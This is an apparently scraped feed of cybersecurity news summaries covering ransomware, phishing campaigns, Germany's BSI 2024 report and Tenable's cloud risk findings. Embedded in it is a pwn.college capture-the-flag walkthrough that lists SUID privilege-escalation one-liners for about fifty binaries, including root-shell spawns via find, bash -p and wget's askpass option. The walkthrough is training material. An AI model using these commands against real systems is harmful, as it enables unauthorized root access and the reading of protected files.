Ransomware isn’t just a buzzword; it’s one of the most dreaded challenges businesses face in this increasingly digitized world. Ransomware attacks are not only increasing in frequency but also in sophistication, with new ransomware groups constantly emerging. Their attack methods are evolving rapidly, becoming more dangerous and damaging than ever. Almost all respondents (99.8%) in a recent

by The Hacker News

Cloud service providers are getting better at protecting data, pushing adversaries to develop new cloud ransomware scripts to target PHP applications, a new report says.

by Dark Reading

“Inactivity reboot"" effectively puts iPhones in a more secure state by locking the user''s encryption keys in the iPhone''s secure enclave chip. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

BEAST, or Browser Exploit Against SSL/TLS, was a man-in-the-middle attack that could expose information from an encrypted SSL/TLS 1.0 session. The attack exploited a known cipher suite vulnerability that was considered low-risk until a proof of concept arrived, prompting browser vendors and web server administrators to quickly move to TLS v1.1. This article shows how the BEAST attack worked, how a theoretical vulnerability became practically exploitable, and why modern browsers are no longer vulnerable. The post How the BEAST attack works: Reading encrypted data without decryption appeared first on Invicti.

by Invicti

Some tech start-ups and investors anticipate a golden era when Donald Trump returns to office, thanks to government contracts and deregulation.

by ITPro Today

Repair options include using dedicated STL repair software, manual CAD edits, or slicer repair tools, along with preventative practices like backing up files and checking geometry integrity to ensure successful prints.

by ITPro Today

The CISA and FBI have issued an advisory detailing a sophisticated cyberespionage campaign by state-sponsored Chinese hackers that…

by Hackread

Advertising on TikTok is the obvious choice for any company trying to reach a young market, and especially so if it happens to be a travel company, with 44% of American Gen Zs saying they use the platform to plan their vacations. But one online travel marketplace targeting young holidaymakers with ads on the popular video-sharing platform broke GDPR rules when a third-party partner misconfigured

by The Hacker News

A newly discovered phishing campaign linked to the Black Friday shopping season launched by a financially motivated threat actor, dubbed “SilkSpecter,” is targeting e-commerce shoppers in the U.S. and Europe. EclecticIQ’s research indicates that this campaign, active since early October 2024, employs fake discount-themed phishing sites to steal sensitive information from online shoppers eager for … The post ‘SilkSpecter’ Campaign Uses 4,000 Fake Domains Against Black Friday Shoppers appeared first on CyberInsider.

by Cyber Insider

More consolidation is afoot in the world of cybersecurity. Bitsight, a cybersecurity startup last valued at $2.4 billion when ratings firm Moody’s took a stake in the business and became its largest shareholder in 2021, is acquiring Cybersixgill for $115 million. Boston-based Bitsight’s focus is cyber risk management. It works with enterprises to assess their […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The City of Miami Beach disclosed a security incident that exposed personal information from some of its utility customers. The breach was due to an inadvertent file exposure in the city''s document management system, making sensitive data briefly accessible to unauthorized users. The breach was first detected on October 14, 2024, after the initial exposure … The post Miami Beach Alerts Residents to Data Breach from Docs Exposure appeared first on CyberInsider.

by Cyber Insider

Threat actors have been found leveraging a new technique that abuses extended attributes for macOS files to smuggle a new malware called RustyAttr. The Singaporean cybersecurity company has attributed the novel activity with moderate confidence to the infamous North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps observed in connection with prior campaigns, including

by The Hacker News

How to Read Sensitive Files with SUID set on the Commands and How to Escalate Privilege Introduction to Pwn College pwn.college is an online platform that offers training modules for cybersecurity professionals. It helps students and others learn about and practice core cybersecurity concepts. Pwn.college is an education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. In martial arts terms, it is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. Our philosophy is “practice makes perfect”. The platform is maintained by an awesome team of hackers at Arizona State University. It powers much of ASU’s cybersecurity curriculum, and is open, for free, to participation for interested people around the world! pwn.college Program Misuse: Privilege Escalation Level 1 — If SUID bit on /usr/bin/cat The ‘cat’ command is commonly used to display the contents of a file. In this scenario, the SUID bit is set for ‘cat,’ enabling us to read the /flag file, which the root user owns cat /flag Level 2: If SUID bit on /usr/bin/more The ‘more’ command is used to view the contents of a file page by page. In this case, we attempt to read the /flag file, leveraging the SUID bit set on ‘more’ and accessing a file owned by root more /flag Level 3: If SUID bit on /usr/bin/less Similar to ‘more,’ ‘less’ is a command-line pager for viewing files interactively. Here, we aim to read the /flag file using ‘less’ with the SUID bit set, dealing with a file owned by root. less /flag Level 4: If SUID bit on /usr/bin/head The ‘head’ command is employed to display the initial lines of a file. In this context, we try to read the /flag file with the SUID bit set on ‘head,’ accessing a file owned by root head /flag Level 5: If SUID bit on /usr/bin/tail Used to display the last few lines of a file, the ‘tail’ command is applied here to read the contents of the /flag file. The SUID bit is set for ‘tail,’ facilitating access to a file owned by root tail /flag Level 6: If SUID bit on /usr/bin/sort Sorting the lines of a file is a common task with the ‘sort’ command. Attempting to read the /flag file, we utilize the SUID bit set for ‘sort’ while dealing with a file owned by root. sort /flag Level 7: If SUID bit on /usr/bin/vim The ‘vim’ text editor is invoked to open and edit files. In this case, we open the /flag file using ‘vim’ with the SUID bit set, aiming to access a file owned by root. vim /flag Level 8: If SUID bit on /usr/bin/emacs As a powerful text editor, ‘emacs’ is used here to open and modify files. We try to read the /flag file using ‘emacs’ with the SUID bit set, addressing a file owned by root emacs /flag p Level 9: If SUID bit on /usr/bin/nano Offering a user-friendly text editor, ‘nano’ is utilized to open and edit files. In this instance, we attempt to read the /flag file using ‘nano’ with the SUID bit set, interacting with a file owned by root. nano /flag Level 10: If SUID bit on /usr/bin/rev Reversing the content of a file is achieved with the ‘rev’ command. Here, we attempt to reverse the /flag file’s content 2 times using ‘rev’ with the SUID bit set, interacting with a file owned by root. rev /flag | rev Level 11: If SUID bit on /usr/bin/od The ‘od’ command displays the octal dump of a file. Trying to read the /flag file, we use ‘od’ with the SUID bit set, interacting with a file owned by the root. od /flag Level 12: If SUID bit on /usr/bin/hd For a hexadecimal dump of a file, the ‘hd’ command is employed. In this scenario, we aim to read the /flag file using ‘hd’ with the SUID bit set, dealing with a file owned by root hd /flag Level 13: If SUID bit on /usr/bin/xxd Generating a hexadecimal dump with line annotations, ‘xxd’ is used here to read the /flag file. The SUID bit is set for ‘xxd,’ allowing access to a file owned by root. xxd /flag Level 14: If SUID bit on /usr/bin/base32 Base32 encoding and decoding is performed with the ‘base32’ command. Here, we Encode and decode the /flag file to read the contents. base32 /flag | base32 -d Level 15: If SUID bit on /usr/bin/base64 Base64 encoding and decoding is performed with the ‘base64’ command. Here, we Encode and decode the /flag file to read the contents. base64 /flag | base64 -d Level 16: If SUID bit on /usr/bin/split The ‘split’ command is used to split the Files. We are splitting the output of files into another file and viewing it through ‘cat’ command split /flag ls cat FILENAME_THAT_IS_GENERATED Level 17: If SUID bit on /usr/bin/gzip ‘gzip’ is a tool to compress and decompress files. Here, we compress the flag and decompress the same to view the contents. gzip -c /flag | gzip -d Level 18: If SUID bit on /usr/bin/bzip2 ‘gzip’ is a tool to compress and decompress files. Here, we compress the flag and decompress the same to view the contents. bzip2 -c /flag | bzip2 -d Level 19: If SUID bit on /usr/bin/zip Creating a zip archive of a file is achieved with the ‘zip’ command. Attempting to create a zip archive of the /flag file, we use ‘zip’ with the SUID bit set, accessing a file owned by root. zip flag.zip /flag && cat flag.zip Level 20: If SUID bit on /usr/bin/tar The ‘tar’ command is used to create and manipulate tar archives. Here, we attempt to create a tar archive of the /flag file using ‘tar’ with the SUID bit set, dealing with a file owned by root. tar -cf flag.tar /flag && cat flag.tar Level 21: If SUID bit on /usr/bin/ar Creating and managing ar archives is done with this command. We try to create an ar archive of the /flag file, utilizing the SUID bit set for ‘ar’ and accessing a file owned by root. F=$(mktemp -u) && ar r “$F” /flag && cat “$F” Level 22: If SUID bit on /usr/bin/cpio The ‘find’ command locates files, and ‘cpio’ is used for archive creation. We attempt to create a cpio archive of the /flag file using ‘find’ and ‘cpio’ with the SUID bit set, dealing with a file owned by root. find /flag | cpio -o > flag.cpioio && cat flag.cpio Level 23: If SUID bit on /usr/bin/genisoimage For creating ISO images, the ‘genisoimage’ command is used. In this case, we attempt to create an ISO image with the /flag file using ‘genisoimage’ with the SUID bit set, interacting with a file owned by root genisoimage -sort /flag Level 24: If SUID bit on /usr/bin/env “The ‘env’ command sets the environment for a command. Here, we use ‘env’ to execute ‘cat’ and display the contents of the /flag file with the SUID bit set, accessing a file owned by root env cat /flag Level 25: If SUID bit on /usr/bin/find The ‘find’ command is employed with the ‘exec’ option to execute commands on found files. We attempt to execute a shell with root privileges and display the /flag file after gaining root access.” find . -exec /bin/sh -p \; cat /flag Level 26: If SUID bit on /usr/bin/make The ‘make’ command builds and maintains programs. In this case, we use ‘make’ to execute ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root make -s — eval=$’x:\n\t-’”cat /flag” Level 27: If SUID bit on /usr/bin/nice The ‘nice’ command alters the scheduling priority of a command. Trying to execute ‘cat’ with an increased priority, we aim to display the /flag file with the SUID bit set, accessing a file owned by root. nice cat /flag Level 28: If SUID bit on /usr/bin/timeout The ‘timeout’ command sets a time limit on the execution of a command. Here, we use ‘timeout’ to limit the execution of ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root timeout 1 cat /flag Level 29: If SUID bit on /usr/bin/stdbuf The ‘stdbuf’ command adjusts buffering options for a command. In this instance, we use ‘stdbuf’ to run ‘cat’ with unbuffered input, attempting to display the contents of the /flag file with the SUID bit set, and accessing a file owned by root. stdbuf -i0 cat /flag Level 30: If SUID bit on /usr/bin/setarch The ‘setarch’ command sets the architecture for a command. Trying to display the contents of the /flag file, we use ‘setarch’ to execute ‘cat’ with the SUID bit set, interacting with a file owned by root setarch $(arch) cat /flag Level 31: If SUID bit on /usr/bin/watch The ‘watch’ command repeats a command at specified intervals. Here, we use ‘watch’ to repeatedly execute ‘cat’ and display the contents of the /flag file with the SUID bit set, dealing with a file owned by root. watch -x cat /flag Level 32: If SUID bit on /usr/bin/socat Socat is a versatile relay tool. Attempting to transfer and display the contents of the /flag file, we use ‘socat’ with the SUID bit set, dealing with a file owned by root. socat -u /flag - Level 33: If SUID bit on /usr/bin/whiptail Whiptail is a dialog box-driven interface. Here, we use ‘whiptail’ to display the contents of the /flag file in a dialog box with specified dimensions, dealing with a file owned by root whiptail — textbox /flag 10 30 Level 34: If SUID bit on /usr/bin/awk The ‘awk’ command is used for pattern scanning and processing. In this scenario, we try to use ‘awk’ to display the contents of the /flag file. awk “//” /flag Level 35: If SUID bit on /usr/bin/sed The ‘sed’ command is a stream editor. Here, we attempt to use ‘sed’ to display the contents of the /flag file sed ‘’ /flag Level 36: If SUID bit on /usr/bin/ed he ‘ed’ editor is employed for line-oriented text editing. Trying to use ‘ed’ to print the contents of the /flag file ed /flag CN #Then type p to print flag and q to quit Level 37: If SUID bit on /usr/bin/chown The ‘chown’ command changes file ownership. Here, we attempt to change the ownership of the /flag file to ‘hacker’ and display its contents chown hacker /flag && cat /flag Level 38: If SUID bit on /usr/bin/chmod The ‘chmod’ command modifies file permissions. In this instance, we attempt to change the permissions of the /flag file to allow read and write access for all users, and then display its contents chmod 666 /flag && cat /flag Level 39: If SUID bit on /usr/bin/cp Copying the /flag file to the current directory is done with the ‘cp’ command. We try to copy the /flag file without the permissions. cp — no-preserve=all /flag . && cat flag Level 40: If SUID bit on /usr/bin/mv The ‘mv’ command is used to move (rename) files. Here we are moving the code of ‘cat’ to the ‘mv’ tool. Now, if we use the ‘mv’ command it will display the contents of the file like ‘cat’. Then we are running the /challenge/babysuid_level40 to set SUID on mv and we can read the contents of the /flag file. mv /usr/bin/cat /usr/bin/mv || ./challenge/babysuid_level40 || mv /flag | grep pwn.college{ Level 41: If SUID bit on /usr/bin/perl The ‘perl’ command is used for text processing. Here, we attempt to use ‘perl’ to display the contents of the /flag file. perl -pe ‘END { close ARGV }’ /flag Level 42: If SUID bit on /usr/bin/python We are trying to run /flag file with python, which throws an error that contains the flag string. You can also try to write a program that reads the content of the /flag file. python /flag Level 43: If SUID bit on /usr/bin/ruby Creating and running a Ruby script to display the contents of the /flag file is done here with ‘echo’ and ‘ruby’ echo “puts File.read(‘/flag’)” >> a.rb && ruby a.rb CN Level 44: If SUID bit on /usr/bin/bash Executing bash with privileged mode is attempted here. After that, we try to use ‘cat’ to display the contents of the /flag file bash -p CN then cat /flag Level 45: If SUID bit on /usr/bin/date The ‘date’ command is typically used for displaying or setting the system date and time. Here, we attempt to use ‘date’ to display the contents of the /flag file. We have to input a datefile for this command but if we give wrong file it will throw an error with the contents of the file. date -f /flag Level 46: If SUID bit on /usr/bin/dmesg The ‘dmesg’ command displays kernel messages. Here, we attempt to use ‘dmesg’ to display the contents of the /flag file dmesg -F /flag Level 47: If SUID bit on /usr/bin/wc The ‘wc’ command is used for word counting. Here, we try to use ‘wc’ to count words in the /flag file specified in a null-terminated list wc — files0-from=/flag Level 48: If SUID bit on /usr/bin/gcc The ‘gcc’ command is a compiler for programming languages. In this scenario, we attempt to preprocess the /flag file using ‘gcc’ with specific flags gcc -x c -E /flag Level 49: If SUID bit on /usr/bin/as The ‘as’ command is an assembler for programming languages. Here, we try to use ‘as’ to assemble the /flag file to display its contents as /flag Level 50: If SUID bit on /usr/bin/wget This command creates a temporary executable script file using mktemp, sets execute permissions, and writes a simple shell script into it. The script is designed to execute /bin/sh with a specific set of options. Finally, it uses wget to download a file, passing the created script as the askpass program, allowing for potential privilege escalation or unauthorized access. Then we can read the /flag file using cat /flag F=$(mktemp) && chmod +x $F && echo -e ‘#!/bin/sh -p\n/bin/sh -p 1>&0’ >$F && wget — use-askpass=$F 0 cat /flag Level 51: If SUID bit on /usr/bin/ssh-agent Thank you for Reading!! Happy Hunting ~ Author: Karthikeyan Nagaraj ~ Cyberw1ng

by HACKLIDO

Cristian Cornea, a cybersecurity expert, devised a clever honeypot trap to ensnare hackers using a fake ransomware builder. Cornea’s “Jinn Ransomware Builder,” while appearing to offer all the tools necessary to launch custom ransomware attacks, was actually backdoored, designed to collect the information of would-be cybercriminals who tried to use it. The Jinn Ransomware Builder … The post Researcher Infected Hackers with Fake “JINN Ransomware” Builder appeared first on CyberInsider.

by Cyber Insider

Multi-step reasoning is a concept that is taught in grade school math class, but it applies far beyond mathematical calculations... The post What is multi-step reasoning? appeared first on Sysdig.

by Sysdig

Risk is real. To better understand cybersecurity risk, let’s compare cyber risks to risks in the natural world from hurricanes. We can learn lessons from hurricanes and unnamed storms in […] The post Cyber Risk Lessons We Can Learn From Hurricane Preparedness appeared first on Black Hills Information Security.

by Black Hills Information Security

If the government truly wants to protect the US''s most vital assets, it must rethink its cybersecurity policies and prioritize proactive, coordinated, and enforceable measures.

by Dark Reading

We’re thrilled to announce the long-awaited sixth season of the award-winning KnowBe4 Original Series - “The Inside Man” is now available in the KnowBe4 ModStore!

by KnowBe4

Key Findings: Introduction On October 30th, the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a joint Cybersecurity Advisory regarding recent activities of the Iranian cyber group Emennet Pasargad. The group recently operated under the name Aria Sepehr Ayandehsazan (ASA) and is affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). […] The post Malware Spotlight:  A Deep-Dive Analysis of WezRat appeared first on Check Point Research.

by Check Point Research

As technology has become an integral part of the learning environment, empowering robust cybersecurity practices in primary and secondary education is now essential. In response to this urgent need, Keeper Security – with support from the National Cybersecurity Alliance (NCA), KnowBe4 and Williams Racing Formula 1 team – has announced the launch of Flex Your […] The post New educational campaign “Flex Your Cyber” launched appeared first on IT Security Guru.

by IT Security Guru

Cloudflare customers can now create Account Owned Tokens , allowing more flexibility around access control for their Cloudflare services. Additionally, Zaraz Automation Actions streamlines event tracking and third-party tool integration.

by Cloudflare

As the digital world evolves, businesses increasingly rely on cloud solutions to store data, run operations and manage applications. However, with this growth comes the challenge of ensuring that cloud environments remain secure and compliant with ever-changing regulations. This is where the idea of autonomous security for cloud (ASC) comes into play. Security and compliance […] The post Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future appeared first on Security Intelligence.

by Security Intelligence

In May 2023, a planet-wide cyberattack compromised the information of 7.9 million employees across 27 multinationals, including giants such as Amazon, HSBC and Lenovo, but also two major Swiss companies: UBS and DSM-Firmenich. The post Massive data leak in Switzerland – Le Temps appeared first on ZENDATA Cybersecurity.

by Zendata

A malvertising campaign using an old school trick was found pushing to different ad blockers.

by Malwarebytes Labs

Germany’s Federal Office for Information Security (BSI) recently released The State of Cybersecurity 2024 report, which illuminates the critical threats and advances in resilience across Germany’s digital landscape. In a joint press briefing, Federal Minister of the Interior Nancy Faeser and BSI President Claudia Plattner said that while the cyberthreat landscape remains tense, resilience measures are proving effective in protecting businesses, institutions, and democratic processes. Federal Minister Nancy Faeser noted the importance of cybersecurity for societal stability, stating, “Cybersecurity is central to our society and affects each and every one of us.” She highlighted that extortion, cyber espionage, and hybrid threats—especially from state-sponsored actors—continue to pose significant risks, necessitating robust cybersecurity investments to safeguard democratic institutions. BSI President Claudia Plattner reinforced this stance, noting that Germany has witnessed increased resilience against cyber threats. However, she warned against complacency: “We must continue to increase our resilience in a nationwide effort.” Both leaders stressed the importance of swiftly incorporating the NIS-2 Directive into national law to fortify Germany’s cyber defenses. Key Findings from BSI’s 2024 Report Rising Threats from Malware and Ransomware Attacks Between mid-2023 and mid-2024, an alarming increase in malware variants was recorded, with an average of 309,000 new variants discovered daily—a 26% increase over the previous year. Much of this rise is attributed to attacks targeting 64-bit Windows systems and an above-average increase in Android malware. Figure 1 - Rising threats in Germany''s cyber threat landscape (Source: BSI) Ransomware continues to be a significant challenge, especially for businesses and government institutions. Data leaks following ransomware attacks have increased, although the percentage of victims paying ransom has dropped. LockBit leads the list of the five most active groups targeting Germany. The group published 40 alleged leak victims on its leak site during the reporting period, followed by BlackBasta and 8Base. Figure 2 - Top 5 Leak pages from July 2024 to June 2024 (Source: BSI) Many organizations now rely on robust backup systems, reducing their dependency on attackers to restore encrypted data. BSI observed that transparent communication about cyber incidents has helped mitigate potential impacts, as other organizations can swiftly address and close similar vulnerabilities. Advanced Persistent Threats (APT) and Cyber Espionage Germany noted the surge in persistent threats from Advanced Persistent Threat (APT) groups, many of which are state-sponsored. Against a backdrop of geopolitical tension, these groups are increasingly targeting political parties, governmental agencies, and corporations for cyber espionage. Germany urged its public and private sectors to adopt proactive threat intelligence and protective measures to defend against these sophisticated, continuous attacks. Cybersecurity for Elections: Ensuring Democratic Integrity For German citizens, not only the European elections but also three state elections in Saxony, Thuringia, and Brandenburg and nine local elections took place. The BSI said the electoral process, communication by the authorities and the media, and the formation of opinion and will in the context of elections are now highly dependent upon information technology and are, therefore, at the center of information security. BSI provided dedicated security oversight, working with electoral authorities to protect the integrity of the voting process. As Germany heads toward future elections, the BSI has enhanced its monitoring and support for political entities, prioritizing resilience against potential cyber threats and disinformation campaigns from state actors. Emerging Cybersecurity Challenges Increase in High-Volume DDoS Attacks The first half of 2024 saw a substantial uptick in Distributed Denial of Service (DDoS) attacks, with a marked increase in high-volume attacks exceeding 10,000 Mbps. DDoS attacks not only disrupt services but are increasingly used to sow public uncertainty by exaggerating their impact on social media. Figure 3 - Proportion of High-Bandwidth DDoS attacks doubled in April 2024 (Source: BSI)  The BSI recommends adopting advanced DDoS mitigation strategies, particularly for critical infrastructure, to withstand these escalating attack volumes. Data Theft Targeting Consumers Phishing remains a major threat to German citizens, with attackers expanding beyond financial institution impersonation to include popular streaming services. During 2024, phishing campaigns have increasingly targeted user data—such as credit card information and personal identifiers—via emails masquerading as communications from banks and entertainment platforms. The BSI advises consumers to stay vigilant and adopt robust identity protection measures to counter phishing attempts. Strategic Initiatives to Strengthen Cyber Resilience Cybernation Germany Initiative The Cybernation Germany initiative, launched in early 2024, is a step towards a national commitment to building resilience and expanding Germany’s cybersecurity expertise. The initiative’s goals align with the NIS-2 Directive and the Cyber Resilience Act (CRA), which impose mandatory cybersecurity measures and incident reporting standards for companies. The CRA emphasizes a “security by design” approach, particularly for IoT devices, to bolster protections across interconnected networks. This initiative demonstrates a concerted push from Germany towards enhanced threat intelligence, cyber resilience, and protective infrastructure. Key Recommendations from BSI for Strengthening Cybersecurity Governance and Risk-Based Policies: Organizations should maintain updated, approved cybersecurity policies, leveraging threat intelligence to refine policies and prioritize high-risk threats. Enhanced Monitoring and Detection: With the rise in malware and ransomware, BSI recommends integrating Security Operations Centers (SOC) with continuous threat detection and red teaming exercises to effectively simulate real-world scenarios. Incident Response and Recovery: BSI encourages organizations to establish structured Incident Response plans, supported by Cyber Threat Intelligence (CTI), to reduce response times and facilitate efficient recovery from cyber incidents. Increased Public Awareness and Resilience Measures: Awareness campaigns, employee training, and enhanced communication strategies have proven effective in helping organizations and consumers defend against phishing and ransomware attacks. Collaboration with International Security Standards: Adhering to NIS-2 and the Cyber Resilience Act ensures that German entities align with European cybersecurity standards, enhancing cross-border protections and maintaining consistent security measures across sectors. Conclusion: A Proactive Path Forward The BSI’s 2024 report reaffirms Germany’s proactive approach to cybersecurity, emphasizing resilience, regulatory compliance, and advanced threat intelligence. With heightened preparedness across government, businesses, and society, Germany is well-positioned to defend against increasingly sophisticated cyber threats. However, as Minister Faeser stated, the evolving cyber threat landscape necessitates continuous investment and adaptation to safeguard Germany’s critical infrastructure and democratic systems. Germany’s Cybernation initiative and collaboration with international cybersecurity frameworks hint at a robust defense strategy that other nations can use as a model. By maintaining proactive measures, aligning with global security standards, and fostering a culture of resilience, Germany aims to ensure cybersecurity remains integral to its digital and democratic future. References: https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2024/241112_Lagebericht_2024.html https://www.bsi.bund.de/EN/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html The post Germany’s Cybersecurity Landscape in 2024 is Worrying but Gaining Resilience appeared first on Cyble.

by CYBLE

Less-experienced users of Microsoft''s website building platform may not understand all the implications of the access controls in its low- or no-code environment.

by Dark Reading

Businesses are prioritizing their investments in AI, but lack the necessary infrastructure and gains from their deployments.

by ZDNET Security

Using a third-party password manager? Here''s why you''ll want to set the autofill option for the right app.

by ZDNET Security

A scammer was caught after they defrauded some 400 people for almost $20 million in real estate.

by Malwarebytes Labs

The X campaign sought to discredit five Lebanese media workers with edited media, gender-based violence, and threats The post Pro-Hezbollah accounts orchestrated digital smear campaign against Lebanese journalists appeared first on DFRLab.

by DFRLab

The Tenable Cloud Risk Report 2024 reveals that nearly four in 10 organizations have workloads that are publicly exposed, contain a critical vulnerability and have excessive permissions. Here’s what to watch for in your organization.In a “GPS mapping” of today’s most pressing cloud security issues, the Tenable Cloud Risk Report 2024 from Tenable Cloud Research revealed serious flaws across workloads, identities, containers, storage and Kubernetes.Particularly concerning was the discovery that nearly four in 10 organizations (38%) have an elevated level of exposure from workloads bearing an especially risky blend of security gaps. We called this blend a “toxic cloud trilogy,” defined as any cloud workload having these three risk factors:A critical vulnerabilityExcessive permissionsPublic exposureLike the big bad wolf in the Little Red Riding Hood fable, a toxic cloud trilogy masks its existence and severity in the cloud environment. The masking makes these high risks hard to spot, prioritize and remediate. In this blog we discuss the implications of the toxic cloud trilogy and offer guidance for actions to avoid them.Why we conducted this researchTo help our customers — and ourselves — better understand the most prevalent risks in cloud environments, the Tenable Cloud Research team analyzed telemetry from millions of cloud resources in active production across multiple public cloud repositories. Conducted in the first half of 2024, the research included cloud workload and configuration information. To determine the most exploitable vulnerabilities the team applied Tenable’s Vulnerability Priority Rating (VPR) to common cloud CVEs.Why a toxic cloud trilogy increases riskA toxic cloud trilogy increases risk by making the workload’s weaknesses easier for attackers to exploit — and making the scope of exploitation potentially greater.Cloud security involves layers of defense to prevent breaches if a given layer fails; a toxic trilogy effectively erodes these layers. Bad actors seek out critical vulnerabilities or publicly accessible assets. Finding one, they can commandeer highly privileged permissions or roles to burrow their way in, accessing — and even exfiltrating — sensitive data. For example, an attacker can modify access policies or elevate privileges, moving laterally and deploying resources to gain access to even more sensitive areas.Prevalence of toxic cloud trilogies in organizations worldwide Source: Tenable Cloud Risk Report 2024, October 2024 The work of mitigating toxic cloud trilogies needs to be high on a security team’s “to do” list. That’s easier said than done. Let’s explore the challenges organizations face in addressing such exposures.Organizational causes of toxic cloud trilogiesHow are such risky combinations getting through? Fault lines can be organizational, due to siloed tooling that limits visibility. Another contributing factor is the distributed ownership of systems, spanning development, IT and cybersecurity teams, among others. Each of these teams may have a different level of risk appetite.Here are three examples of how these factors contribute to the creation of toxic cloud trilogies:Didn’t see it. Siloed tooling looks for specific kinds of flaws. They can create false positives that don’t show the full context of an identified exposure, such as a vulnerability not being in runtime so not exploitable.Will the cloud risk owner please stand up? Depending on the organization — its size and organizational structure — many roles may play a part in managing cloud risk. You’d need to have a holistic view to catch a toxic trilogy.Risk hungry? The National Institute of Standards and Technology (NIST) defines cyber risk appetite as “The types and amount of risk, on a broad level, an organization is willing to accept in its pursuit of value.” While an organization may have its strategic risk appetite clearly spelled out, different teams with conflicting business goals may make compromises in implementation that clear the way for toxic cloud trilogies.Why toxic cloud trilogy factors persist in organizationsLet’s take a closer look at each factor implicated in a toxic cloud trilogy and why these issues can be so difficult for organizations to address.Critical vulnerabilitiesAttackers abuse cloud vulnerabilities — flaws in cloud-based software — to gain unauthorized access, steal sensitive data and/or disrupt services. You would expect published CVEs to be easy, low-hanging fruit for cybersecurity teams to act on quickly. Doing so prevents or dismantles a toxic cloud trilogy. Yet, to our surprise, many high risk vulnerabilities in the data we examined remained unremediated even a month after a CVE was published.High risk vulnerabilities remained largely unremediated after 30 days.Why does remediating a vulnerability take so much time? One reason may be that, regardless of who technically “owns” vulnerability management in the organization, it requires the involvement of several teams. Depending on the organization’s structure, those involved in the process of remediating vulnerabilities could include security teams alerting vulnerability management teams, applications teams issuing software update requests of operating systems teams and DevSecOps teams needing to make related changes in CI/CD pipelines.Another “drag” factor in resolving vulnerabilities may be tactical: teams see vulnerability remediation as time-consuming, requiring an arbitrary cycle of tasks. Adopting conventional wisdom, they may try to save cycles by taking a “batch the patch” approach: delaying the fix until every relevant patch is available. While this approach is understandable from a time management perspective, it places operational efficiency above security.Excessive permissionsAttackers target credentials, putting identity and access management (IAM) on the radar of everyone responsible for securing the cloud. Overprivileged human identities are a known, high-impact risk factor in identity-based attacks. Overprivileged non-human identities are the key impact factor in breaches based on application vulnerabilities. All are part of the same IAM system.87% of human identities in AWS have critical or high excessive permissionsOur research revealed extensive instances of excessive permissions in both human and non-human identities. We also found that human identities are granted significantly more risky excessive permissions than non human identities. For example, in the Amazon Web Services (AWS) permissions we studied, the vast majority had excessive critical and high risk permissions.Human and non-human identity permissions in AWS Source: Tenable Cloud Risk Report 2024, October 2024 Avoiding risky permissions is a cloud security best practice, and also, in many cases, a compliance requirement, achieved by acting on least privilege implementation.At the helm of permissions and access management are the IAM teams. Aided by no shortage of cloud providers and third-party tools — including AWS IAM, Microsoft Azure Active Directory, Google Cloud Platform (GCP) IAM; AWS IAM Access Analyzer, Azure Privileged Identity Management (PIM), Okta and Auth0 — they work to create and maintain access permissions structures and policies, and apply least privilege to the extent possible.Security teams, on the other hand, are at another helm, and using other tools, to spot exposures. They are looking not only at permissions but also workloads, data, applications and infrastructure as a whole. This broader approach informs security teams about permissions-related risks as well as granular policy refinements that enforce least privilege, including when elevated permissions should be granted but limited by time.By design, IAM tools lack full stack and even multi-cloud entitlements context; they may recommend least privilege yet from a narrow permissions and policy lens. They are unable to bring into focus access risk that feeds into a vulnerability or resource to create a toxic cloud trilogy.IT and security leaders need to enable their IAM and security teams to work closely with each other. Do they?And why are human identities more likely to be assigned excessive privileges? In some cases, project managers prevail upon their IT colleagues to elevate privileges for an urgent business need. Note, too, that developers may be using programmatic, IAM role-based templates to define access for non-human identities.Public exposureThe phrase “public exposure” conjures up an actor performing before an audience. In cloud infrastructure, public assets — databases, websites, email servers and other online services — are just that: exposed to external networks so legitimate parties outside the organization can access them.Risk increases when assets are unintentionally public with either excessive permissions and/or a vulnerability. Worse is when the asset contains sensitive data. Organizations need to be able examine whether an asset is configured as public. In the case of publicly exposed cloud storage, they need to be able to discover and classify sensitive data contained within, including who can access it and how it is used, so any remediation measures can be prioritized accordingly.29% of organizations have public-facing storage bucketsOur research found that 96% of organizations have public-facing cloud assets; 29% of organizations have public-facing storage buckets. It is essential to know if this exposure is due to a misconfiguration, such as an unpatched resource or overprivileged access. If oversight is at play, it may be due to business drivers such as time to market or lack of cloud security personnel, or the need to implement guardrails, policies or visibility. Context and tools are needed to be able to monitor and close such exposure, and downgrade permissions to the minimal needed.Key actions to prevent toxic cloud trilogiesTaking a few key actions can prevent toxic cloud trilogies in your cloud environment. Here’s what we recommend:Treat your cloud infrastructure security as a whole. Attackers have figured out that multi-cloud integrations offer fertile ground. Put your multiple cloud environments under one security roof, unifying workload monitoring, entitlements management and security posture, for comprehensive visibility. Include contextual analysis to reveal which cloud assets hold sensitive data and who can access them.Don’t wait, remediate CVEs. Make it your organization’s security culture to quickly address severe vulnerabilities. Context matters when prioritizing vulnerabilities for remediation. The ability to quickly analyze which systems contain a vulnerability, which users interact with that system, what data is stored there and whether or not it’s publicly accessible will enable you to prioritize those vulnerabilities which represent the greatest risk to your organization. You’ll be able to give prescriptive guidance to the other teams involved in your vulnerability remediation process.Don’t underestimate permissions risk. Analyze all identities dynamically, enabling teams to identify access risk and confidently resolve the excessive permissions that lead to toxic cloud trilogies. Apply least privilege principles, including through time-saving just-in-time access controls that make developers willing security partners.Be aware of public-facing assets and configurations. External exposure is a double-edged sword — necessary for doing business and a potential source of exposure. Rein in and monitor assets configured as public.SummaryOur research showed that unwittingly or not, many organizations have unnecessary exposures in their cloud environments. Since we can’t know what a malicious actor will do next, control what you can. Add context to unmask and prioritize security gaps like the cloud toxic trilogy, and close such exposures swiftly.Learn moreRead the Tenable Cloud Risk Report 2024View the on-demand webinar Empower Your 2025 Cloud Security Planning with Tenable''s Data InsightsRead the Tenable Cloud Risk Report Sounds the Alarm on Toxic Cloud Exposures Threatening Global Organizations

by Tenable

